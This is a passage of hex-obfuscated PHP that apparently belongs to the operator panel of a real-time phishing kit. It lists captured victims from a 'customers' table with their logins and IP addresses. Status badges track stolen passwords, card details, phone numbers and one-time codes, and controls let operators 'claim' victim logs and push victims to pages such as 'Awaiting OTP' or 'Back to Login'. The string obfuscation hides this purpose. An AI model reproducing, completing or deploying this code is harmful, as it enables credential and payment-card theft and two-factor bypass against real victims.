"\x3c\163\x70\141\x6e\x20\x63\x6c\x61\163\x73\x3d\x22\x62\141\144\147\145\x20\142\141\x64\x67\x65\55\160\162\x69\x6d\x61\162\171\x22\76\x53\x75\x62\155\x69\164\x74\145\x64\x20\103\x61\x72\x64\x20\x49\156\146\x6f\74\x2f\163\160\x61\156\76"; } elseif ($value["\x73\164\x61\164\165\x73"] == 7) { $info = "\x3c\163\x70\141\x6e\40\143\154\x61\x73\163\75\x22\x62\141\144\x67\x65\40\x62\x61\x64\x67\x65\55\x70\162\151\x6d\x61\x72\x79\42\x3e\x53\165\x62\155\151\164\164\145\144\x20\x50\x68\157\156\x65\40\116\x6f\x2e\74\57\163\x70\141\156\76"; } elseif ($value["\x73\x74\141\164\x75\163"] == 8) { $info = "\74\163\x70\141\x6e\x20\x63\x6c\141\163\x73\75\42\142\x61\x64\147\145\x20\x62\x61\x64\147\x65\55\x70\162\151\155\x61\162\171\x22\x3e\123\x75\x62\155\151\164\164\145\144\x20\x50\x61\171\x20\x43\157\144\145\74\x2f\163\160\141\x6e\76"; } elseif ($value["\x73\x74\141\x74\x75\163"] == 9) { $info = "\x3c\x73\x70\x61\156\x20\x63\x6c\141\x73\163\75\42\142\141\x64\147\x65\40\x62\141\x64\147\x65\55\160\x72\x69\155\141\x72\171\x22\76\x53\165\142\x6d\x69\164\x74\145\x64\40\x50\141\163\163\167\157\x72\144\74\57\163\160\x61\156\76"; } elseif ($value["\163\x74\x61\164\165\163"] == 11) { $info = "\74\163\x70\x61\156\40\143\x6c\141\x73\x73\75\x22\x62\141\x64\x67\145\40\142\x61\144\x67\145\x2d\160\x72\151\x6d\141\x72\x79\x22\x3e\101\167\x61\x69\164\x69\156\x67\40\x4d\x75\x6c\164\151\40\143\157\144\x65\74\57\x73\x70\x61\x6e\76"; } elseif ($value["\163\x74\141\x74\165\163"] == 12) { $info = "\74\163\x70\x61\x6e\40\143\154\141\163\x73\75\x22\142\x61\144\x67\x65\40\x62\141\x64\x67\145\55\160\x72\x69\x6d\141\x72\x79\42\76\x41\167\x61\151\x74\151\156\x67\40\117\124\120\74\57\163\x70\141\156\x3e"; } elseif ($value["\163\164\x61\164\x75\x73"] == 13) { $info = "\74\163\x70\x61\156\40\x63\154\x61\163\x73\x3d\x22\142\x61\x64\147\145\40\x62\x61\x64\147\x65\55\160\x72\151\155\x61\x72\x79\x22\76\x41\167\x61\x69\164\151\156\147\x20\x41\156\163\167\145\x72\x3c\57\163\160\141\156\x3e"; } elseif ($value["\x73\x74\141\x74\165\x73"] == 14) { $info = "\x3c\x73\160\x61\x6e\40\x63\x6c\x61\x73\163\75\42\142\141\144\147\145\x20\142\x61\x64\x67\145\55\160\162\151\155\x61\x72\171\x22\76\101\x77\141\x69\164\151\156\x67\x20\102\141\x73\151\143\x20\111\x6e\146\x6f\74\x2f\163\160\141\156\x3e"; } elseif ($value["\163\164\141\x74\165\163"] == 15) { $info = "\74\x73\160\x61\x6e\40\143\154\x61\163\x73\75\42\142\x61\x64\147\145\x20\142\141\x64\x67\x65\55\160\x72\x69\155\x61\x72\x79\x22\76\101\x77\x61\151\164\151\156\x67\40\103\141\162\x64\x20\x49\156\x66\157\x20\x3c\57\163\160\x61\x6e\76"; } elseif ($value["\x73\164\141\x74\165\163"] == 16) { $info = "\x3c\x73\x70\141\156\x20\x63\x6c\141\x73\163\x3d\x22\142\141\x64\147\145\x20\142\x61\144\x67\x65\55\160\x72\x69\155\141\x72\x79\x22\x3e\x41\x77\141\x69\x74\x69\156\147\x20\120\150\x6f\156\x65\x20\116\157\x2e\74\x2f\x73\x70\141\156\x3e"; } elseif ($value["\163\164\x61\x74\x75\x73"] == 17) { $info = "\74\x73\x70\141\x6e\x20\x63\154\141\x73\x73\x3d\x22\x62\x61\144\147\145\x20\x62\x61\144\x67\x65\55\160\x72\151\155\x61\162\x79\x22\76\127\141\x69\164\151\x6e\147\40\x6f\156\x20\154\157\141\x64\x69\156\147\40\x70\141\147\x65\x3c\x2f\163\x70\x61\x6e\x3e"; } elseif ($value["\x73\x74\x61\164\165\163"] == 18) { $info = "\74\163\x70\x61\156\x20\143\154\141\x73\163\75\x22\142\141\144\x67\145\40\x62\141\144\x67\x65\x2d\x70\x72\151\155\x61\162\x79\42\x3e\101\167\x61\151\x74\151\156\147\x20\x50\141\x73\163\167\x6f\162\144\x3c\57\x73\x70\x61\156\76"; } elseif ($value["\163\164\141\164\165\x73"] == 50) { $info = "\x3c\x73\160\x61\156\40\x63\154\x61\163\x73\75\42\142\x61\144\x67\x65\x20\x62\141\x64\x67\145\x2d\x70\162\151\155\141\162\x79\42\76\102\141\x63\x6b\40\164\x6f\x20\x4c\x6f\x67\151\x6e\74\x2f\x73\160\x61\x6e\x3e"; } elseif ($value["\163\164\141\164\165\163"] == 100) { $info = "\74\163\x70\x61\156\x20\143\x6c\141\163\163\75\42\142\x61\144\147\x65\40\142\141\x64\x67\145\x2d\x69\x6e\x66\157\42\76\x49\116\126\x41\x4c\x49\104\74\57\x73\160\x61\x6e\76"; } elseif ($value["\x73\x74\x61\x74\165\163"] == 20) { $info = "\x3c\x73\160\x61\x6e\x20\143\154\141\163\163\75\42\x62\141\x64\x67\x65\x20\x62\x61\144\147\x65\x2d\x73\x75\x63\x63\x65\163\x73\42\x3e\x46\x69\156\x69\x73\150\145\144\74\57\163\x70\141\x6e\x3e"; } if ($value["\x73\164\x61\x74\x75\x73"] == 20) { $userStatus = "\74\x73\160\141\156\x3e\x3c\x69\155\147\40\163\162\x63\x3d\42\x70\141\x72\x74\x69\x61\154\x2f\x69\155\x67\57\x6f\146\x66\56\x70\156\x67\42\x20\163\x74\171\154\145\x3d\x22\167\151\144\x74\x68\x3a\62\60\x70\x78\x3b\x70\141\144\x64\x69\x6e\147\x2d\x72\151\x67\x68\x74\x3a\x31\x70\170\x22\x3e\x3c\142\76\x4f\146\x66\x6c\151\x6e\145\74\x2f\142\76\x3c\x2f\163\160\141\x6e\x3e"; echo "\xa\x9\11\11\11\74\x74\x72\40\163\164\x79\154\x65\x3d\x27\x63\x6f\154\157\162\72\167\150\x69\x74\145\47\76\xa\x9\11\11\x9\11\74\x74\144\x3e{$value["\151\144"]}\x3c\x2f\x74\144\x3e\12\x9\11\x9\11\11\74\x74\144\x3e{$value["\165\163\162\x6c\157\x67\151\156"]}\x3c\x2f\x74\x64\x3e\xa\x9\x9\11\11\11\74\164\144\76{$userStatus}\x3c\57\x74\x64\76\xa\11\x9\x9\x9\11\74\164\x64\x3e{$value["\151\160"]}\x3c\57\x74\144\x3e\12\x9\11\x9\x9\11\74\x74\144\76{$info}\x3c\x2f\164\x64\76\xa\x9\11\11\11\x9\74\x74\x64\x3e\12\11\11\x9\x9\x9\11\74\142\165\x74\x74\157\x6e\40\164\171\160\145\x3d\47\142\x75\x74\x74\x6f\x6e\x27\x20\157\x6e\143\x6c\x69\143\x6b\x3d\x27\166\151\145\x77\x5f\x6c\157\147\x42\164\x6e\50\164\x68\x69\x73\51\47\40\x63\x6c\141\163\163\x3d\47\x62\x74\156\x20\x62\x74\156\x2d\155\144\x20\142\x74\156\55\x64\141\162\153\47\40\x69\x64\x3d\x27\165\x73\145\x72\151\144\137{$value["\x69\144"]}\x27\x20\x64\x61\164\141\x2d\164\157\147\x67\154\145\75\x27\155\x6f\x64\x61\154\x27\x20\144\141\164\141\55\164\x61\162\x67\145\164\x3d\x27\x23\x76\151\145\167\155\157\144\141\154\x5f\x75\163\145\162\151\x64\137{$value["\x69\144"]}\47\76\x56\151\x65\167\x20\114\157\147\x3c\x2f\x62\x75\164\164\157\156\x3e\12\11\11\11\x9\x9\11\74\x62\x75\x74\164\x6f\x6e\x20\164\171\x70\145\75\47\142\x75\164\x74\x6f\156\x27\x20\x63\154\x61\x73\163\x3d\x27\x62\164\156\40\x62\164\x6e\x2d\x6d\144\x20\x62\x74\156\55\144\141\156\x67\145\162\47\x20\151\x64\75\47\x75\x73\x65\162\151\144\x5f{$value["\x69\x64"]}\47\157\156\143\x6c\151\143\153\75\47\144\x65\154\x65\x74\145\145\156\x74\162\171\50\x74\150\151\163\51\47\76\x3c\x69\x20\143\154\x61\163\163\x3d\47\146\141\x20\146\x61\55\x74\162\141\x73\150\47\x20\x61\162\x69\141\55\x68\x69\144\x64\145\156\75\47\164\x72\165\145\47\x3e\74\x2f\151\76\x3c\x2f\142\165\164\164\x6f\156\x3e\12\11\x9\x9\x9\x9\x3c\x2f\164\144\x3e\12\11\x9\x9\11\x3c\57\x74\162\76\xa\11\x9\x9\x9"; } else { $userStatus = "\x3c\163\160\x61\x6e\76\x3c\151\x6d\147\40\x73\162\x63\x3d\x22\x70\141\162\164\x69\x61\154\57\151\x6d\147\x2f\x6f\146\146\56\160\156\x67\42\40\163\x74\171\x6c\x65\x3d\x22\x77\151\x64\x74\x68\72\62\x30\x70\170\x3b\160\141\144\144\151\x6e\147\55\x72\x69\x67\x68\164\x3a\61\x70\x78\x22\76\74\x62\76\117\146\x66\x6c\x69\156\x65\x3c\x2f\142\76\x3c\57\163\x70\x61\156\76"; $savedStatus = $value["\154\x61\163\164\x5f\x61\x63\164\151\x76\x69\x74\x79"]; if ($savedStatus !== null) { $user_main_status = new DateTime($savedStatus); $currentTime = new DateTime("\156\x6f\x77"); $indicator = $currentTime->getTimestamp() - $user_main_status->getTimestamp(); if ($indicator <= 8) { $userStatus = "\74\x73\x70\141\156\x3e\x3c\x69\x6d\x67\x20\163\162\143\x3d\42\160\x61\x72\x74\151\141\x6c\x2f\151\x6d\147\x2f\x6f\x6e\56\x70\156\x67\42\40\x73\x74\x79\x6c\145\x3d\x22\x77\151\144\x74\150\72\x32\x30\x70\170\x3b\160\x61\144\x64\x69\x6e\147\55\162\x69\147\150\x74\72\x31\x70\170\42\76\74\x62\76\x4f\156\154\151\156\x65\x3c\x2f\x62\x3e\x3c\57\163\160\141\x6e\x3e"; } } else { if ($savedStatus === null) { $userStatus = "\x3c\163\x70\x61\156\x3e\x3c\151\155\147\x20\x73\x72\x63\x3d\42\160\x61\162\164\151\x61\x6c\57\x69\155\x67\57\156\141\x2e\x70\x6e\147\x22\40\x73\164\171\154\x65\75\x22\167\151\x64\x74\150\x3a\62\65\x70\x78\73\160\141\144\144\151\x6e\x67\55\x72\x69\147\x68\x74\x3a\x31\x70\170\x22\x3e\74\142\76\116\x6f\x20\144\x61\x74\141\x3c\x2f\142\76\74\x2f\x73\x70\x61\156\x3e"; } } if ($Multiple_Admins == "\157\x66\x66") { echo "\12\11\11\11\x9\x9\74\x74\x72\x20\163\164\x79\154\x65\75\47\x63\157\x6c\x6f\162\72\x77\x68\151\164\x65\47\76\12\11\11\x9\11\11\11\74\164\144\x3e{$value["\151\x64"]}\74\x2f\164\144\76\xa\x9\11\x9\x9\x9\11\74\164\x64\x3e{$value["\x75\163\x72\154\157\147\151\x6e"]}\74\x2f\x74\144\x3e\12\x9\x9\x9\x9\11\x9\74\x74\x64\x3e{$userStatus}\x3c\x2f\x74\144\76\xa\11\x9\x9\11\11\x9\74\x74\144\76{$value["\x69\x70"]}\74\x2f\164\x64\76\xa\11\11\x9\x9\x9\11\74\164\x64\x3e{$value["\x63\157\155\155\x65\156\164"]}\74\57\x74\x64\76\12\11\11\11\x9\x9\11\74\x74\x64\x3e{$info}\x3c\57\x74\x64\76\12\x9\x9\x9\x9\x9\x9\74\x74\144\76\12\11\x9\x9\11\11\11\11\74\x62\x75\164\164\157\x6e\x20\164\x79\x70\x65\x3d\x27\x62\x75\x74\x74\157\156\47\x20\157\156\x63\154\x69\x63\153\75\x27\143\157\x6e\x74\x72\157\154\102\x74\x6e\x28\x74\x68\151\x73\51\47\40\x63\x6c\141\163\163\x3d\47\x62\x74\156\40\x62\x74\156\x2d\x6d\144\40\142\x74\156\x2d\x69\156\x66\157\47\x20\x69\144\x3d\x27\165\163\145\162\151\144\x5f{$value["\151\x64"]}\x27\x20\x64\x61\164\141\55\x74\x6f\147\147\x6c\145\75\x27\155\x6f\x64\141\x6c\x27\40\x64\141\164\x61\x2d\x74\141\x72\147\145\164\75\x27\x23\155\157\x64\141\x6c\x5f\x75\x73\145\162\x69\x64\137{$value["\x69\144"]}\x27\x3e\x41\143\164\151\x6f\156\x3c\57\x62\165\x74\x74\x6f\156\76\xa\x9\11\x9\11\x9\x9\x9\x3c\x62\x75\x74\x74\157\156\x20\164\171\160\145\75\x27\x62\165\x74\x74\157\156\x27\40\x63\x6c\x61\x73\x73\x3d\x27\142\164\156\x20\x62\x74\x6e\55\155\x64\40\142\x74\x6e\x2d\144\141\156\x67\x65\162\47\40\x69\x64\x3d\47\x75\163\x65\x72\151\x64\x5f{$value["\151\144"]}\47\x6f\156\143\154\x69\x63\153\75\47\144\145\x6c\145\x74\x65\145\x6e\164\x72\171\50\x74\150\151\x73\x29\x27\76\x3c\x69\x20\x63\154\x61\163\x73\75\x27\x66\x61\40\146\141\x2d\164\x72\141\163\150\47\x20\141\162\151\x61\x2d\x68\151\x64\x64\x65\156\75\x27\x74\162\165\145\x27\x3e\74\x2f\x69\76\x3c\57\142\165\x74\164\157\x6e\76\xa\11\x9\x9\x9\x9\11\x3c\x2f\x74\x64\x3e\xa\11\11\x9\11\x9\74\x2f\x74\162\x3e\12\x9\11\11\x9\11"; } else { if ($value["\x6c\157\x67\x5f\157\x77\156\145\x72"] == '') { echo "\xa\11\11\x9\11\x9\11\x3c\x74\x72\40\163\164\x79\x6c\145\x3d\x27\143\157\154\157\x72\x3a\x77\x68\151\x74\x65\47\76\xa\x9\x9\11\11\11\11\x9\x3c\x74\144\76{$value["\151\144"]}\74\57\x74\144\76\12\11\x9\11\x9\x9\11\11\x3c\x74\144\76{$value["\165\x73\x72\154\x6f\x67\151\156"]}\74\57\x74\x64\x3e\xa\11\x9\x9\11\x9\11\x9\x3c\164\144\x3e{$userStatus}\74\x2f\164\x64\x3e\xa\11\11\x9\x9\11\11\11\x3c\x74\144\76{$value["\151\160"]}\74\57\164\144\x3e\12\11\11\11\x9\11\11\11\x3c\164\x64\76{$value["\143\x6f\155\x6d\x65\x6e\x74"]}\x3c\x2f\x74\x64\x3e\12\11\x9\11\x9\11\11\11\74\x74\x64\76{$info}\74\x2f\164\x64\76\xa\11\x9\x9\x9\x9\x9\11\x3c\x74\x64\x3e\12\x9\11\11\11\x9\11\11\x9\x3c\x62\x75\164\164\157\156\x20\164\171\x70\145\75\47\x62\165\164\x74\157\156\47\x20\157\156\143\x6c\x69\143\x6b\75\x27\143\x6c\x61\151\155\x42\164\x6e\50\164\150\x69\163\x29\x27\x20\143\154\141\x73\163\75\x27\142\164\x6e\x20\x62\x74\x6e\x2d\155\x64\40\x62\164\156\x2d\151\x6e\146\157\47\40\151\x64\75\x27\165\163\145\x72\151\x64\137{$value["\x69\x64"]}\x27\x20\144\x61\x74\141\55\x74\x6f\147\147\154\x65\75\x27\155\x6f\144\x61\x6c\x27\x20\x64\x61\164\x61\x2d\164\141\162\147\x65\164\75\47\x23\155\157\144\x61\154\137\165\163\145\162\151\x64\137{$value["\x69\x64"]}\x27\x3e\x20\x43\154\x61\151\155\40\114\x6f\147\40\xf0\237\224\x91\74\x2f\x62\x75\164\x74\157\x6e\x3e\12\x9\11\x9\11\11\x9\x9\74\57\164\x64\x3e\xa\x9\11\x9\x9\x9\x9\74\x2f\x74\x72\x3e\xa\11\11\x9\x9\x9\11"; } else { if ($value["\154\157\x67\137\x6f\167\156\145\162"] == $_SESSION["\154\157\147\137\157\167\156\x65\162"]) { echo "\12\11\11\x9\x9\11\x9\74\164\x72\x20\163\x74\x79\x6c\x65\75\47\x63\x6f\154\x6f\x72\x3a\167\x68\151\164\145\x27\76\xa\11\11\11\11\11\11\11\74\x74\144\76{$value["\151\144"]}\74\x2f\x74\x64\76\12\11\x9\x9\11\11\x9\x9\x3c\164\x64\x3e{$value["\165\163\162\x6c\157\x67\x69\x6e"]}\74\x2f\x74\144\76\12\11\11\x9\11\11\11\11\74\164\x64\76{$userStatus}\74\x2f\164\144\76\xa\11\x9\11\x9\11\x9\x9\74\x74\144\76{$value["\x69\x70"]}\x3c\x2f\164\x64\76\12\x9\11\11\11\11\x9\11\74\x74\144\x3e{$value["\143\157\155\155\145\x6e\164"]}\x3c\57\x74\144\76\12\11\11\x9\11\x9\x9\x9\x3c\x74\x64\76{$info}\74\x2f\164\144\76\xa\11\x9\11\11\11\x9\x9\74\164\144\76\12\x9\11\11\11\11\x9\11\x9\x3c\142\165\x74\x74\157\156\40\x74\x79\160\x65\75\x27\x62\165\164\164\x6f\x6e\47\40\157\x6e\x63\x6c\151\143\x6b\75\47\x63\x6f\156\164\162\157\154\x42\164\x6e\50\164\150\x69\x73\51\x27\40\x63\x6c\141\163\163\75\47\142\x74\156\40\x62\164\156\x2d\155\x64\x20\142\164\x6e\x2d\151\x6e\x66\157\x27\40\151\x64\75\x27\x75\163\x65\162\151\x64\x5f{$value["\x69\144"]}\x27\40\144\141\164\x61\x2d\x74\157\x67\147\154\145\75\x27\x6d\157\144\141\x6c\47\40\x64\141\164\141\55\164\141\x72\147\145\164\x3d\x27\x23\x6d\x6f\x64\141\154\x5f\x75\163\x65\162\x69\144\x5f{$value["\x69\x64"]}\x27\x3e\101\x63\164\x69\157\156\x3c\x2f\142\x75\x74\164\157\156\x3e\12\x9\11\11\x9\11\11\x9\x9\74\142\165\x74\164\x6f\156\40\x74\x79\160\145\x3d\47\x62\x75\x74\164\157\x6e\x27\x20\143\x6c\x61\x73\x73\75\47\142\x74\156\x20\142\164\156\x2d\155\x64\40\x62\x74\156\x2d\x64\141\156\147\x65\162\x27\x20\151\x64\75\47\165\x73\145\x72\x69\x64\x5f{$value["\x69\144"]}\x27\x6f\156\x63\x6c\151\x63\153\x3d\x27\x64\x65\x6c\x65\164\x65\145\156\164\162\171\50\164\150\151\163\x29\x27\x3e\74\151\x20\143\154\141\163\163\x3d\x27\x66\141\x20\146\x61\55\164\162\x61\x73\150\47\40\141\162\151\141\x2d\x68\151\144\144\x65\x6e\x3d\x27\164\162\x75\145\47\x3e\74\x2f\x69\76\74\57\x62\165\164\x74\157\x6e\76\xa\x9\11\x9\x9\11\x9\11\x3c\57\164\144\x3e\12\11\x9\x9\11\11\11\x3c\x2f\164\162\x3e\xa\11\x9\11\x9\x9\11"; } else { echo "\xa\x9\11\11\11\x9\11\74\164\x72\x20\163\164\x79\154\145\x3d\x27\x63\157\154\x6f\162\x3a\167\150\x69\x74\x65\x27\x3e\12\x9\x9\11\x9\11\11\11\x3c\x74\x64\76{$value["\151\x64"]}\74\x2f\164\144\76\xa\11\x9\11\x9\x9\x9\x9\x3c\x74\144\76{$value["\x75\x73\x72\154\157\147\x69\x6e"]}\74\57\164\x64\x3e\xa\x9\11\x9\x9\x9\x9\11\74\164\144\x3e{$userStatus}\74\x2f\164\x64\x3e\xa\x9\11\x9\11\11\x9\x9\74\164\144\x3e{$value["\x69\x70"]}\x3c\x2f\164\144\x3e\xa\11\x9\x9\x9\11\x9\11\74\x74\144\76{$value["\143\x6f\x6d\x6d\145\x6e\164"]}\x3c\x2f\x74\x64\76\xa\x9\x9\11\11\x9\x9\x9\x3c\x74\x64\x3e{$info}\74\x2f\x74\144\76\xa\x9\11\x9\x9\x9\x9\11\x3c\164\144\x3e\12\11\x9\11\11\11\x9\x9\11\x3c\163\x70\x61\156\76\x43\x6c\x61\151\155\145\x64\x20\x62\x79\40\55\40\x3c\151\x3e{$value["\x6c\x6f\x67\x5f\157\167\156\x65\x72"]}\74\57\x69\x3e\x3c\57\x73\160\141\x6e\x3e\12\x9\11\11\x9\11\x9\11\x3c\57\x74\144\76\xa\11\x9\x9\x9\x9\x9\74\x2f\164\162\x3e\12\11\x9\11\x9\11\x9"; } } } } } } if (isset($_GET["\x66\145\x74\143\150\137\x64\x61\164\141"])) { $query = mysqli_query($conn, "\x53\x45\x4c\105\x43\124\x20\52\40\x66\162\x6f\155\x20\143\x75\163\x74\x6f\x6d\x65\162\163"); if ($query) { if (mysqli_num_rows($query) >= 1) { $array = array_filter(mysqli_fetch_all($query, MYSQLI_ASSOC)); } } foreach ($array as $value) { if ($value["\163\x74\141\164\165\x73"] == 500) { $info = "\x3c\163\160\x61\156\40\143\154\x61\x73\163\75\x22\142\x61\144\147\x65\40\x62\141\144\x67\145\55\x77\141\162\x6e\x69\x6e\x67\x22\76\x45\141\x73\x74\145\x72\40\145\x67\147\x3c\57\x73\160\x61\x6e\x3e"; } elseif ($value["\163\164\x61\x74\x75\163"] == 1) { $info = "\x3c\163\160\x61\156\40\x63\154\x61\163\x73\x3d\42\142\141\144\147\145\x20\x62\141\x64\x67\x65\55\x69\156\146\x6f\x22\76\116\x65\x77\x20\x55\x73\x65\162\x3c\57\163\x70\141\x6e\76"; } elseif ($value["\163\x74\141\x74\x75\163"] == 2) { $info = "\x3c\163\x70\x61\156\40\x63\x6c\x61\x73\163\x3d\42\142\141\x64\147\x65\x20\x62\x61\x64\147\145\55\160\x72\151\x6d\x61\162\x79\x22\x3e\123\165\142\x6d\151\164\x74\145\x64\40\115\165\154\x74\151\40\103\x6f\144\x65\x3c\x2f\163\160\x61\x6e\x3e"; } elseif ($value["\x73\164\x61\x74\x75\x73"] == 3) { $info = "\x3c\163\160\141\x6e\40\x63\x6c\x61\x73\x73\x3d\x22\142\141\x64\147\x65\40\x62\x61\x64\147\x65\x2d\160\x72\x69\x6d\x61\x72\171\42\76\123\165\142\x6d\x69\164\x74\x65\144\x20\x4f\x54\x50\x3c\x2f\x73\x70\x61\x6e\x3e"; } elseif ($value["\163\x74\141\164\165\x73"] == 4) { $info = "\74\163\x70\141\x6e\x20\x63\154\x61\163\163\x3d\x22\142\x61\x64\147\145\x20\142\141\144\x67\x65\x2d\160\x72\x69\x6d\x61\x72\x79\x22\76\123\165\142\155\151\164\164\145\144\x20\101\156\163\167\145\x72\x3c\x2f\163\x70\x61\x6e\76"; } elseif ($value["\x73\164\x61\x74\x75\x73"] == 5) { $info = "\x3c\163\x70\x61\x6e\40\x63\x6c\x61\163\163\75\42\142\141\x64\x67\x65\x20\142\x61\144\x67\145\55\x70\162\x69\155\x61\162\171\42\76\123\165\x62\155\151\164\x74\145\x64\x20\x42\141\163\151\x63\x20\x49\x6e\146\157\x3c\57\x73\x70\x61\x6e\76"; } elseif ($value["\163\x74\141\164\x75\x73"] == 6) { $info = "\74\163\x70\x61\156\40\143\x6c\x61\x73\163\75\42\x62\x61\144\147\x65\x20\142\141\x64\147\x65\x2d\x70\x72\151\155\x61\162\x79\42\x3e\123\x75\142\x6d\x69\x74\164\x65\144\x20\x43\141\x72\144\40\111\x6e\146\x6f\x3c\x2f\x73\160\x61\x6e\76"; } elseif ($value["\x73\164\141\x74\x75\163"] == 7) { $info = "\x3c\163\x70\141\x6e\40\x63\154\x61\163\x73\x3d\x22\x62\141\144\x67\x65\x20\142\141\144\x67\145\55\x70\x72\151\x6d\141\162\x79\x22\x3e\123\165\x62\x6d\x69\x74\x74\x65\x64\x20\x50\150\x6f\x6e\x65\x20\x4e\x6f\x2e\74\57\163\x70\141\x6e\x3e"; } elseif ($value["\x73\x74\141\x74\x75\x73"] == 8) { $info = "\x3c\163\160\x61\156\40\143\154\x61\163\163\75\42\142\x61\x64\147\x65\40\142\x61\x64\x67\145\x2d\x70\162\151\155\141\162\x79\42\76\123\x75\x62\155\x69\x74\x74\x65\x64\x20\x50\x61\x79\40\103\157\x64\145\74\x2f\163\x70\x61\x6e\76"; } elseif ($value["\163\164\x61\164\165\163"] == 9) { $info = "\x3c\x73\x70\141\156\40\143\x6c\x61\163\163\x3d\x22\x62\141\x64\x67\x65\x20\x62\141\x64\147\145\x2d\x70\162\151\155\x61\x72\171\42\x3e\123\x75\142\x6d\x69\164\x74\x65\144\40\120\141\163\163\x77\157\162\x64\74\x2f\163\x70\x61\156\76"; } elseif ($value["\163\x74\x61\164\165\163"] == 11) { $info = "\74\x73\x70\141\156\40\143\x6c\x61\163\x73\x3d\42\142\x61\x64\147\145\40\x62\x61\x64\147\x65\55\x70\162\151\155\x61\162\171\42\76\x41\167\x61\151\x74\151\156\x67\40\115\165\154\x74\151\x20\143\157\x64\x65\x3c\x2f\x73\x70\141\x6e\x3e"; } elseif ($value["\163\x74\141\164\x75\x73"] == 12) { $info = "\74\x73\x70\141\156\x20\143\x6c\x61\163\163\75\42\x62\x61\x64\147\145\40\142\x61\x64\147\x65\55\160\162\x69\155\141\162\171\42\x3e\x41\x77\141\151\x74\151\x6e\x67\40\117\x54\120\x3c\57\163\x70\x61\156\x3e"; } elseif ($value["\163\164\141\164\165\163"] == 13) { $info = "\x3c\163\160\141\156\40\143\154\x61\x73\163\75\42\x62\141\144\147\x65\x20\x62\x61\x64\147\x65\55\x70\x72\x69\155\x61\x72\171\x22\76\101\x77\141\151\x74\151\x6e\x67\x20\x41\x6e\163\x77\x65\162\x3c\x2f\163\160\x61\156\x3e"; } elseif ($value["\x73\x74\x61\164\165\163"] == 14) { $info = "\x3c\163\x70\141\156\x20\x63\154\x61\x73\x73\75\42\142\141\x64\x67\x65\x20\x62\141\x64\147\145\55\160\162\x69\x6d\141\x72\x79\42\x3e\101\x77\141\151\164\x69\x6e\147\x20\x42\141\x73\151\x63\40\111\x6e\146\x6f\74\x2f\163\160\x61\x6e\76"; } elseif ($value["\x73\x74\x61\x74\x75\x73"] == 15) { $info = "\x3c\163\160\141\x6e\x20\x63\x6c\141\x73\x73\75\42\142\x61\x64\147\x65\40\x62\141\x64\147\x65\55\x70\162\x69\x6d\x61\x72\171\42\x3e\101\167\x61\151\x74\x69\x6e\x67\40\x43\141\162\x64\x20\111\x6e\x66\x6f\x20\74\x2f\x73\x70\141\x6e\x3e"; } elseif ($value["\x73\x74\141\x74\x75\163"] == 16) { $info = "\x3c\x73\x70\x61\156\40\143\154\x61\163\163\x3d\x22\142\141\x64\x67\x65\x20\142\141\x64\x67\145\55\x70\162\151\155\x61\x72\171\x22\x3e\x41\167\141\151\x74\x69\x6e\147\40\120\150\157\x6e\145\40\116\157\x2e\x3c\57\x73\x70\141\x6e\76"; } elseif ($value["\x73\164\x61\164\x75\x73"] == 17) { $info = "\74\x73\x70\x61\156\40\x63\x6c\141\163\x73\x3d\42\142\x61\x64\147\145\x20\142\x61\x64\147\x65\x2d\160\162\x69\155\x61\162\x79\x22\x3e\127\x61\151\x74\x69\156\x67\40\x6f\156\x20\x6c\157\141\144\x69\x6e\x67\x20\160\141\x67\x65\x3c\x2f\163\160\141\156\76"; } elseif ($value["\163\x74\x61\x74\165\163"] == 18) { $info = "\x3c\163\160\141\156\x20\143\x6c\141\x73\163\75\x22\142\141\x64\x67\145\40\142\x61\x64\147\145\55\x70\x72\x69\155\x61\x72\171\x22\x3e\x41\x77\141\151\164\x69\156\x67\x20\x50\x61\x73\163\167\157\162\x64\74\x2f\163\160\141\x6e\x3e"; } elseif ($value["\163\164\x61\164\x75\x73"] == 50) { $info = "\74\x73\160\x61\156\40\143\x6c\x61\x73\x73\x3d\42\142\141\x64\147\x65\40\x62\141\x64\x67\x65\55\x70\x72\x69\x6d\141\x72\x79\42\76\102\141\x63\153\x20\x74\157\x20\114\x6f\147\151\156\74\x2f\x73\160\141\x6e\x3e"; } elseif ($value["\163\x74\141\x74\165\163"] == 100) { $info = "\74\x73\160\x61\156\40\143\154\x61\163\x73\75\42\x62\x61\x64\x67\145\40\142\141\144\x67\145\55\151\156\146\x6f\x22\x3e\111\116\126\101\114\111\x44\x3c\57\163\160\141\156\x3e"; } elseif ($value["\x73\x74\x61\x74\165\163"] == 20) { $info = "\x3c\163\160\x61\x6e\40\x63\154\141\x73\163\x3d\x22\142\x61\x64\147\x65\40\x62\x61\144\147\x65\55\163\165\143\143\x65\x73\x73\x22\x3e\x46\x69\156\x69\x73\150\x65\x64\74\x2f\163\160\x61\x6e\76"; } if ($value["\x73\164\x61\x74\x75\x73"] == 20) { $userStatus = "\74\x73\x70\141\x6e\x3e\74\x69\x6d\x67\x20\163\162\143\x3d\42\x70\141\162\164\151\x61\154\x2f\151\155\x67\x2f\x6f\146\146\56\x70\156\x67\42\40\163\164\171\x6c\145\x3d\x22\x77\x69\144\164\150\x3a\x32\x30\x70\170\73\160\x61\x64\144\x69\x6e\147\x2d\162\x69\x67\150\164\x3a\x31\160\x78\x22\76\74\x62\76\117\x66\146\x6c\151\156\x65\74\x2f\x62\x3e\x3c\x2f\x73\160\x61\156\76"; echo "\12\11\11\11\11\74\x74\162\40\x73\164\x79\154\145\75\x27\143\x6f\x6c\157\162\x3a\x77\x68\x69\x74\145\x27\x3e\12\11\11\11\x9\x9\74\x74\x64\76{$value["\x69\x64"]}\74\x2f\x74\144\x3e\12\x9\11\x9\11\x9\x3c\x74\144\76{$value["\165\163\x72\154\x6f\147\151\x6e"]}\74\x2f\x74\144\x3e\xa\x9\11\11\x9\11\x3c\164\x64\76{$userStatus}\74\57\164\144\76\12\x9\11\11\11\x9\74\x74\144\x3e{$value["\x69\160"]}\x3c\57\x74\x64\76\12\x9\x9\11\x9\x9\74\164\144\76{$info}\74\x2f\x74\x64\x3e\xa\x9\11\11\x9\11\x3c\164\x64\x3e\xa\x9\11\x9\11\11\x9\x3c\142\165\164\x74\x6f\x6e\x20\164\171\160\x65\75\x27\142\165\x74\x74\157\x6e\x27\40\157\156\x63\x6c\x69\x63\x6b\75\x27\x76\151\145\x77\137\x6c\157\x67\102\164\156\x28\x74\x68\x69\x73\x29\47\x20\x63\154\141\x73\163\x3d\x27\142\164\x6e\40\142\164\156\x2d\155\144\x20\142\164\x6e\55\x64\x61\162\153\47\x20\151\x64\75\47\165\163\x65\162\151\x64\137{$value["\151\144"]}\x27\x20\x64\141\164\x61\55\164\x6f\147\147\x6c\x65\x3d\47\155\x6f